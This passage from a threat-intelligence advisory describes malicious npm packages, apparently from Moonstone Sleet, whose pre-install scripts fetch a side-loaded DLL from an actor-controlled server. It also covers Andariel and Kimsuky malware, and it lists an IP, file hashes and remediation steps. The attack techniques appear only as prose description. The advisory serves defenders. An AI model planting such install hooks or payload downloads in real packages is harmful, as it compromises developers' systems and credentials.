After loading, the malicious package is connected to an actor-controlled IP address using curl to release more malicious payloads, such as SplitLoader. Another instance involved the delivery of a malicious npm loader by Moonstone Sleet, which resulted in the theft of LSASS credentials. The later discoveries revealed that Moonstone Sleet has also been trying to disseminate its packages via the npm registry.

To download a DLL file that is side-loaded using the rundll32.exe binary, the recently discovered packages are intended to execute a pre-install script that is specified in the package.json file. This script then verifies whether it is operating on a Windows system ("Windows_NT") and then connects to an external server. While it does not carry out any malicious deeds, the rogue DLL may have been unintentionally uploaded to the registry before encoding dangerous code, or it may have been a test run for its payload delivery system.

The development coincides with a warning from South Korea's National Cyber Security Center (NCSC) about cyberattacks carried out by North Korean threat groups identified as Andariel and Kimsuky. These groups aim to penetrate the country's construction and machinery sectors by distributing malware families like Dora RAT and TrollAgent, also known as Troll Stealer. The Dora RAT attack sequence is notable because the malware was spread by the Andariel threat actors by taking advantage of flaws in a local VPN program's software update system.

Impact

• Unauthorized Access
• Identity Theft
• Credential Theft

Indicators of Compromise

IP

• 142.111.77.196

MD5

• ed862abb071c3f94b6a776238fce2514

SHA-256

• d2a74db6b9c900ad29a81432af72eee8ed4e22bf61055e7e8f7a5f1a33778277

SHA-1

• cf754dd578c5d2772b3255233445b7beeccb1091

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Regularly change passwords for all accounts and use strong, unique passwords for sensitive accounts.
• Implement multi-factor authentication (MFA) on all accounts to add an extra layer of security to login processes.
• Consider the use of phishing-resistant authenticators to further enhance security. These types of authenticators are designed to resist phishing attempts and provide additional protection against social engineering attacks.
• Regularly monitor network activity for any unusual behavior, as this may indicate that a cyberattack is underway.
• Organizations need to stay vigilant and follow best practices for cybersecurity to protect their systems and data from potential threats. This includes regularly updating software and implementing strong access controls and monitoring tools.
• Develop a comprehensive incident response plan to respond effectively in case of a security breach or data leakage.
• Maintain regular backups of critical data and systems to ensure data recovery in case of a security incident.
• Adhere to security best practices, including the principle of least privilege, and ensure that users and applications have only the necessary permissions.
• Establish a robust patch management process to ensure that security patches are evaluated, tested, and applied promptly.
• Conduct security audits and assessments to evaluate the overall security posture of your systems and networks.
• Implement network segmentation to contain and isolate potential threats to limit their impact on critical systems.
• Never trust or open links and attachments received from unknown sources/senders.